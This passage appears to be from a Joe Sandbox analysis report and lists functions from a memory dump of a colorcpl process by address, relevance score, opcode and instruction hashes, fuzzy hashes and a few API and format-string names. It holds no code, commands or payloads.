                                                                                                                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                          • Instruction ID: 88c6ec9eb971a4fd64ac0bc5386685ef6bc08147b1bfa2168e5617fc93fc9084
                                                                                                                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                          • Instruction Fuzzy Hash: 74E0923264C3908FC7148A1AC242B93B7ECEFB5766F2580AAD92847716C231F842D6D0
                                                                                                                                          Function 227DA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                          • Instruction ID: 35067755fb5608a36b3cb4f3418e53d738048528a22b0b0fc2d82c8f0dc8f7fa
                                                                                                                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                          • Instruction Fuzzy Hash: F9E09232018710DFD7335F25C908B62B7E0FF50755F148C2DA49A124B0CBB8A8C0CA80
                                                                                                                                          Function 227225E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 40fae56c2f7ef63ac8bc54731b57bc3f5109b83a815f6e7d4d4e40520767abe4
                                                                                                                                          • Instruction ID: d438607150ec638b2b04caaf9e98282f198c12365854877953141329e188be04
                                                                                                                                          • Opcode Fuzzy Hash: 40fae56c2f7ef63ac8bc54731b57bc3f5109b83a815f6e7d4d4e40520767abe4
                                                                                                                                          • Instruction Fuzzy Hash: A3E09232104B549BC323AB29CD05F9A779AEFB0360F014625F156571D1CB74AC50C7C8
                                                                                                                                          Function 227A4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                          • Instruction ID: 8aded25efe4a19dff4ebe7d7524a411928ff1ac9e8d4118966461e488e641854
                                                                                                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                          • Instruction Fuzzy Hash: ABE0AE343043058BD705CF19C161B6277B6BFD5A24F24C1B8A9488F205EB33A8429A40
                                                                                                                                          Function 2275CA38 Relevance: .0, Instructions: 22COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5107e0cfb543f32e6eefc515a8aae06aa4fa44691921ca494ba8692051fce212
                                                                                                                                          • Instruction ID: b09218f93e5c8e8470606f7b550a958fbc8086eca0baf6af3225edc7e5fbad7b
                                                                                                                                          • Opcode Fuzzy Hash: 5107e0cfb543f32e6eefc515a8aae06aa4fa44691921ca494ba8692051fce212
                                                                                                                                          • Instruction Fuzzy Hash: 10D02B328CD3706ACB2AD1147C08F837E999B44720F014874FE0897051E554CC91C2C8
                                                                                                                                          Function 2271823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                          • Instruction ID: 00fe3c6b7ec252ca949d23a0bf66683c0542e554f91ebd00869c37992724d739
                                                                                                                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                          • Instruction Fuzzy Hash: 89E0C23100DB20EFE7371F21DD08F5276A1FFA4B10F644929E4842B0A487B4AC81CB44
                                                                                                                                          Function 22722050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dbd3a23a20b4df4276963f75e480f622cc54ca80e0a46841254514bfb17395cc
                                                                                                                                          • Instruction ID: 8fd47d63d3404951b50bd3462512ccbab22289ebe6cdcdf632756012323e8404
                                                                                                                                          • Opcode Fuzzy Hash: dbd3a23a20b4df4276963f75e480f622cc54ca80e0a46841254514bfb17395cc
                                                                                                                                          • Instruction Fuzzy Hash: 9EE08C32105A606BC312EA5DDD10F4A739AEFA4360F010221F1919B6D0CA64EC40C794
                                                                                                                                          Function 22758A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                          • Instruction ID: 98f500642ec3d17c04c299058cf4884c3a200750a638b02cfa1b6da3a5bcc0ea
                                                                                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                          • Instruction Fuzzy Hash: 5BE08633115B1487C714DE14D511B62B7E4EF45720F05463EBA5347780C534E954C798
                                                                                                                                          Function 22776AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                          • Instruction ID: 560e0f9529a8f4121efa6cf96afaa1c5ef41544c19e8c5bae8ee61ae59d896c3
                                                                                                                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                          • Instruction Fuzzy Hash: 6ED05E36512B50AFC7328F1BEA04C13BBF9FBC4B107060A6EA54583A24C670AC46CBA0
                                                                                                                                          Function 2275E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                          • Instruction ID: a78462cfa68ab32e70f61891736bd8d439f3e381f413ebea2433c50ac797222e
                                                                                                                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                          • Instruction Fuzzy Hash: EBD0C932659760ABE7729A1CFD04FC373E9AB98761F160859B019CB191C765AC81CA84
                                                                                                                                          Function 2279E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                          • Instruction ID: 8c8b79aa04a735b8522a0ca368839f721533c1c97c465312755a491826e8076b
                                                                                                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                          • Instruction Fuzzy Hash: 26E08232A08B80AFCF13CF98DB40F4AB7F8BB84B40F110048E0086B260C228A800CB80
                                                                                                                                          Function 2271A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                          • Instruction ID: 3c44369aa0d8c44c32bf592584ab9baf54e47ff6d58eaf5e86bf60d044dc7984
                                                                                                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                          • Instruction Fuzzy Hash: 1DD0223221B23093CB2A46506A04F536A159FC0A94F16002C3409A3800C00C8C82D2F0
                                                                                                                                          Function 2275CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cdc56a803e69027edca1f676b3d679e46c1f64d84a92b520d967988c6647d071
                                                                                                                                          • Instruction ID: 63cf3c89ed8965c56fa232e300c429a4adc18b0add02426e2fe2c1df9ac054c1
                                                                                                                                          • Opcode Fuzzy Hash: cdc56a803e69027edca1f676b3d679e46c1f64d84a92b520d967988c6647d071
                                                                                                                                          • Instruction Fuzzy Hash: 31D0523164A3058BCF0ACF04CA10E2ABAB0EF20A41B800068EB00A2061E328E811CA40
                                                                                                                                          Function 2275A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                          • Instruction ID: 4e4603ed5fbe1d5699b5e0d097835c23475b5b47f879197b786c65351fa922a7
                                                                                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                          • Instruction Fuzzy Hash: C3D012371D064CBBCB229F65DC01F957BA9E7A4BA0F444420B5148B5A1C63AE990D584
                                                                                                                                          Function 227302A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                          • Instruction ID: e7667511b7b935b4cebf03eae24e1cf14ec999457c550e7ce5ff6bebebd69d7b
                                                                                                                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                          • Instruction Fuzzy Hash: 37D0C93561AF80CFC207CB08C6A0F1633A8BB44B84FC104A0E501CBB22D66CD940CA00
                                                                                                                                          Function 2275C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                          • Instruction ID: ce565566a6b32f6be148626b9a88cd173c1f13275c693fdae30ffb860244da62
                                                                                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                          • Instruction Fuzzy Hash: EAC01232294748AFC7229A98CD01F027BA9EBA8B40F000421F2048B6B1C635E860EA84
                                                                                                                                          Function 22740310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                          • Instruction ID: df0b9508817ce29e3fa919e9224ab682bdb5dc2dc9a67cb2fad0e183f2227c5d
                                                                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                          • Instruction Fuzzy Hash: E1D01236104348EFCB06DF41C890D9A7B3AFBD8710F108019FD19076108A31ED62DA50
                                                                                                                                          Function 22720750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                          • Instruction ID: 9e8dbe63e229e57d6729f8fa41f667ef10009d0c71b1fc867fca3381ec1aa0bc
                                                                                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                          • Instruction Fuzzy Hash: 6CC04879716B458FCF16CB2AE398F4977F8FB84750F190890E805CFB22E628E901CA10
                                                                                                                                          Function 22762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                          • Opcode ID: 8bd94cc1a4701c85e41cd3d56b48bfefff6d25dd5271134dd2784cf6b9878751
                                                                                                                                          • Instruction ID: 71ced9db3481065946bc8c62c627a4de0ff2c659a82c837e8032d241ed7b6178
                                                                                                                                          • Opcode Fuzzy Hash: 8bd94cc1a4701c85e41cd3d56b48bfefff6d25dd5271134dd2784cf6b9878751
                                                                                                                                          • Instruction Fuzzy Hash: 2A51F9B2B08316BFDB51DBA889C0A7EF7B8BB58200750C269E854E7641E674DE00C7E0
                                                                                                                                          Function 227D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                          • Opcode ID: 2fc5bbb0db614a6ef2e4ea6786a8e6f2b48c37db22c3da75d01e1dff6a91e052
                                                                                                                                          • Instruction ID: 61a3a1aef7f101539df240b57b6548fe0b23d276bbdb3d68a9c92e8a008b3a1e
                                                                                                                                          • Opcode Fuzzy Hash: 2fc5bbb0db614a6ef2e4ea6786a8e6f2b48c37db22c3da75d01e1dff6a91e052
                                                                                                                                          • Instruction Fuzzy Hash: D6510776A08755AEDB20CF5CCA90D7FBBF8AF54200B508859E496D7643E7B4EE01C760
                                                                                                                                          Function 227F6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                          • Instruction ID: 9d02347dab715eb657dede758767c59d782236cc4bf653feb4e08b3140c1c68a
                                                                                                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                          • Instruction Fuzzy Hash: CD02137150C341AFC305CF19C594A6BBBE5EFC8704F508A2DBAA89B364DB31E905CB42
                                                                                                                                          Function 227D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                                                          • API String ID: 48624451-2819853543
                                                                                                                                          • Opcode ID: 21dd7947b8ab2f3a26a4736c99a8bde9c9eb15754ad4eccd278ce899108e56ac
                                                                                                                                          • Instruction ID: 4f8ed3db8b82f7f033fba3ced2b648aa7042b6eaec1598171c80ee2dd9c6ac4c
                                                                                                                                          • Opcode Fuzzy Hash: 21dd7947b8ab2f3a26a4736c99a8bde9c9eb15754ad4eccd278ce899108e56ac
                                                                                                                                          • Instruction Fuzzy Hash: CE218177A04319ABDB01DE69CD44ABE7BF9AF68744F444126E915E3201E771DA028BA0
                                                                                                                                          Function 227D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                          • Opcode ID: 9ca43d2a00d516b1480dd068a5e493f671f24562dc0fd7d97765197465e99e78
                                                                                                                                          • Instruction ID: 09391e8a3371f46efe069589d437b1329ce4610d457cc4f05e5ed69fe373f2da
                                                                                                                                          • Opcode Fuzzy Hash: 9ca43d2a00d516b1480dd068a5e493f671f24562dc0fd7d97765197465e99e78
                                                                                                                                          • Instruction Fuzzy Hash: 13318473A04319AFCB11CF28CD44BEE77F8EF54614F900596ED49E3241EB70AA458BA0
                                                                                                                                          Function 22729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $$@
                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                          • Opcode ID: 07f52f073430763c204e5c50f2f0c7e71a198d0eeba339748c1ee7e76c1f7dc4
                                                                                                                                          • Instruction ID: ccdc9dc594b4821070a77fbb3d798aac0d534159528c12d383de8d5cad76cf08
                                                                                                                                          • Opcode Fuzzy Hash: 07f52f073430763c204e5c50f2f0c7e71a198d0eeba339748c1ee7e76c1f7dc4
                                                                                                                                          • Instruction Fuzzy Hash: 9F813971D04369DBDB328B54CD44BDAB7B4AF08714F0042EAEA19B7280E7709E80DFA1